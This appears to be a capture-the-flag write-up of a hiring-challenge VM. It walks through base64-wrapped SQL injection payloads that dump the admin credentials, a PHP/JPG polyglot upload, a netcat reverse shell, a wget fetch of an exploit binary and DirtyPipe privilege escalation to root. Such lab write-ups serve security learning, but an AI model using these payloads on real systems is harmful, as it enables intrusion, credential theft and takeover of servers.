# Saptang Labs Hiring Challenge
***
**Challenge Type** : *Blackbox Testing*
**Challenge Description** :
Download the VM and start it. It has a web application hosted which is configured to boot at start so you can put the VM in the background. Simply find the address of the application and start pentesting.
**Challenge Goal** : *Find the file `flag.txt` and read its content.*
***
First we start by finding the IP of machine here i used the `netdiscover` command.
```shell
┌─[aftab@parrot]─[~/Downloads/practice/challenge]
└──╼ $sudo netdiscover -r 192.168.1.12/24
Currently scanning: Finished! | Screen View: Unique Hosts
5 Captured ARP Req/Rep packets, from 5 hosts. Total size: 300
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.1.4 **:**:**:**:**:** 1 60 CHONGQING FUGUI ELECTRONICS
192.168.1.1 **:**:**:**:**:** 1 60 Syrotech Networks. Ltd.
192.168.1.5 **:**:**:**:**:** 1 60 Intel Corporate
192.168.1.21 **:**:**:**:**:** 1 60 Intel Corporate
```
here `192.168.1.1` is ip of router.
we scane the IP `192.168.1.5`,`192.168.1.21` and the IP `192.168.1.21` have web service running at port 42710.
I use `rustscan` for port scaning in CTFs because it is insanely fast.
```shell
┌─[aftab@parrot]─[~/Downloads/practice/challenge]
└──╼ $rustscan -a 192.168.1.21
File limit higher than batch size. Can increase speed by increasing batch size '-b 924'.
Open 192.168.1.21:42710
Starting Script(s)
Script to be run Some("nmap -vvv -p {{port}} {{ip}}")
...
```
opening this website we have nothing but this page:
First though was to look for `robots.txt` file but no luck so i did directory bruteforcing with gobuster.
```shell
┌─[aftab@parrot]─[~/Downloads/practice/challenge]
└──╼ $gobuster dir -u http://192.168.1.21:42710/ -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.21:42710/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/12/21 22:09:58 Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 280]
/.htaccess (Status: 403) [Size: 280]
/.htpasswd (Status: 403) [Size: 280]
/Admin (Status: 301) [Size: 321] [--> http://192.168.1.21:42710/Admin/]
/assets (Status: 301) [Size: 322] [--> http://192.168.1.21:42710/assets/]
/includes (Status: 301) [Size: 324] [--> http://192.168.1.21:42710/includes/]
/index.php (Status: 200) [Size: 349]
/search_result (Status: 301) [Size: 329] [--> http://192.168.1.21:42710/search_result/]
/server-status (Status: 403) [Size: 280]
===============================================================
2022/12/21 22:10:05 Finished
===============================================================
```
now we have some interesting directories like Admin and search\_result.
Admin page requires authentication Username and Password.
now this is something interesting there is link to
*The Results of 2022 have not been published yet* so let's try 2021 :
on submitting the form we have this response:
\
`ID, Name, Roll, Marks` it looks like it is fetching this data from sql database so lets try SQL injection.
this POST request have `data=NjIxNzI5NTgx` it base64 encoded value of `621729581`.
lets try with simple payload `' OR 1=1 #` but it is not working after few tries i tried `621729581 OR 1=1` base64 encode and it gives us all the entries hooray, and that is successful SQL injection.
payload=
```
data=<@base64>621729581 OR 1=1<@/base64>
```
<-- I'm using Hackvertor burp extension.
we know the number of columns it is 4 : `ID, Name, Roll, Marks`.So the payload for union attack would be:
payload:
```
data=<@base64>621729581 UNION SELECT NULL, NULL, NULL, NULL<@/base64>
```
It gives us the result in response so payload is correct and we also know the data types it should be Integer for ID, Roll, Marks and String for Name so we can put this values in payload.
payload:
```
data=<@base64>621729581 UNION SELECT 1, "name", 2, 3<@/base64>
```
response:
Now we can try to extract the databases'name, tables'name, columns'name.
Reference:
payload:
```
data=<@base64>621729581 UNION SELECT 1, gRoUp_cOncaT(0x7c,schema_name,0x7c), 2, 3 fRoM information_schema.schemata<@/base64>
```
response:
```
|mysql|,|information_schema|,|performance_schema|,|sys|,|ezbox|
```
Now let's try to extract table name.
payload:
```
data=<@base64>621729581 UNION SELECT 1, gRoUp_cOncaT(0x7c,table_name,0x7c), 2, 3 fRoM information_schema.tables<@/base64>
```
response:
```
|results|,|users|,|ADMINISTRABLE_ROLE_AUTHORIZATIONS|,|APPLICABLE_ROLES|,|CHARACTER_SETS|,|CHECK_CONSTRAINTS|,|COLLATIONS|,|COLLATION_CHARACTER_SET_APPLICABILITY|,|COLUMNS|,|COLUMNS_EXTENSIONS|,|COLUMN_PRIVILEGES|,|COLUMN_STATISTICS|,|ENABLED_ROLES|,|ENGINES|,|EVENTS|,|FILES|,|INNODB_BUFFER_PAGE|,|INNODB_BUFFER_PAGE_LRU|,|INNODB_BUFFER_POOL_STATS|,|INNODB_CACHED_INDEXES|,|INNODB_CMP|,|INNODB_CMPMEM|,|INNODB_CMPMEM_RESET|,|INNODB_CMP_PER_INDEX|,|INNODB_CMP_PER_INDEX_RESET|,|INNODB_CMP_RESET|,|INNODB_COLUMNS|,|INNODB_DATAFILES|,|INNODB_FIELDS|,|INNODB_FOREIGN|,|INNODB_FOREIGN_COLS|,|INNODB_FT_BEING_DELETED|,|INNODB_FT_CONFIG|,|INNODB_FT_DEFAULT_STOPWORD|,|INNODB_FT_DELETED|,|INNODB_FT_INDEX_CACHE|,|INNODB_FT_INDEX_TABLE|,|INNODB_INDEXES|,|INNODB_METRICS|,|INNODB_SESSION_TEMP_TABLESPACES|,|INNODB_TABLES|,|INNODB_TABLESPACES|,|INNODB_TABLESPACES_BRIEF|,|INNODB_TABLESTATS|,|INNODB_TEMP_TABLE_INFO|,|INNODB_TRX|,|INNODB_VIRTUAL|,|KEYWORDS|,|KEY_COLUMN_USAGE|,|OPTIMIZER_TRACE|,|PARAMETERS|,|PARTITIONS|,|PLUGINS|,|PRO
```
We have table with name `users` let's see the columns of this table.
payload:
```
data=<@base64>621729581 UNION SELECT 1, gRoUp_cOncaT(0x7c,column_name,0x7c), 2, 3 fRoM information_schema.columns wHeRe table_name="users"<@/base64>
```
response:
```
|id|,|password|,|profile_picture|,|username|,|CURRENT_CONNECTIONS|,|TOTAL_CONNECTIONS|,|USER|
```
We have username and password here what should we do extract them!
payload:
```
data=<@base64>621729581 UNION SELECT 1, gRoUp_cOncaT(0x7c,username,0x7c), 2, 3 fRoM users<@/base64>
```
response: `|Admin|`
username=Admin
payload:
```
data=<@base64>621729581 UNION SELECT 1, gRoUp_cOncaT(0x7c,password,0x7c), 2, 3 fRoM users<@/base64>
```
response: `|zohl8meicohci9raw0|`
password=zohl8meicohci9raw0
We have username and password let's login as Admin.
looking at source code we have this comment:
visiting this page
We have functionality of file upload let's try uploading some php file.
Oops error can't upload php, let's try simple jpg file.
so we can only upload jpg file but how it is checking for file type extension? let's do one experiment rename the jpg file to php if error it is looking for extension and if successful it is checking MIME type.
Record updated successfullyThe file has been uploaded
so MIME type it is.
We have to create polyglot PHP/JPG payload. how i do it is open jpg file and append php payload at last so let's create [simple.php](https://github.com/Aftab700/Writeups/blob/main/Others/files/simple.php) payload.
**Record updated successfullyThe file has been uploaded** and file is uploaded successfully but where ?
we have column name profile\_picture in users table, if you remember that we still have SQLi.
payload=
```
data=<@base64>621729581 UNION SELECT 1, gRoUp_cOncaT(0x7c,profile_picture,0x7c), 2, 3 fRoM users<@/base64>
```
result = `|../assets/uploads/simple.php|`
so our file is at
It works just fine let's get reverse shell. for reference:
[revshell.php](https://github.com/Aftab700/Writeups/blob/main/Others/files/revshell.php)
we start listener: `nc -lvnp 8888`
and path=
on visiting this file we have reverse shell:
```shell
┌─[aftab@parrot]─[~/Downloads/practice/challenge]
└──╼ $nc -lvnp 8888
listening on [any] 8888 ...
connect to [192.168.1.12] from (UNKNOWN) [192.168.1.21] 38442
Linux heathrow-VirtualBox 5.11.0-16-generic #17-Ubuntu SMP Wed Apr 14 20:12:43 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
23:44:47 up 2:01, 1 user, load average: 0.00, 0.01, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
heathrow tty2 tty2 21:32 2:12m 0.03s 0.03s /usr/libexec/gnome-session-binary --systemd --session=ubuntu
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bash: cannot set terminal process group (732): Inappropriate ioctl for device
bash: no job control in this shell
www-data@heathrow-VirtualBox:/$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@heathrow-VirtualBox:/$
```
We have shell but we can't access /home/heathrow we need to escalate our privilege. first thing that comes in mind is linpeas.sh let's move that to victim machine i create local server with python `python -m http.server 80`, to transfer file because we normally don't have internet access in victim machine.
change permissions to +x : `chmod +x linpeas.sh`
Now run the file: `./linpeas.sh`
Analyzing the output we have first suggestion for **\[CVE-2022-0847] DirtyPipe**:
reference:
we follow the steps in GitHub repo and we have `exploit-1`, `exploit-2`. transfer this to victim machine and run.
```shell
www-data@heathrow-VirtualBox:/tmp$ wget 192.168.1.12/exploit-2
wget 192.168.1.12/exploit-2
--2022-12-22 00:04:11-- http://192.168.1.12/exploit-2
Connecting to 192.168.1.12:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 21480 (21K) [application/octet-stream]
Saving to: 'exploit-2'
0K .......... .......... 100% 395K=0.05s
2022-12-22 00:04:11 (395 KB/s) - 'exploit-2' saved [21480/21480]
```
```shell
www-data@heathrow-VirtualBox:/tmp$ ./exploit-2 /usr/bin/sudo
./exploit-2 /usr/bin/sudo
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
find / -type f -name "flag.txt" 2>/dev/null
/home/heathrow/flag.txt
cat /home/heathrow/flag.txt
flag{box_cracked_successfully_report_to_admin}challenge
```
***
flag:
```shell
flag{box_cracked_successfully_report_to_admin}challenge
```
:octocat: Happy Hacking :octocat: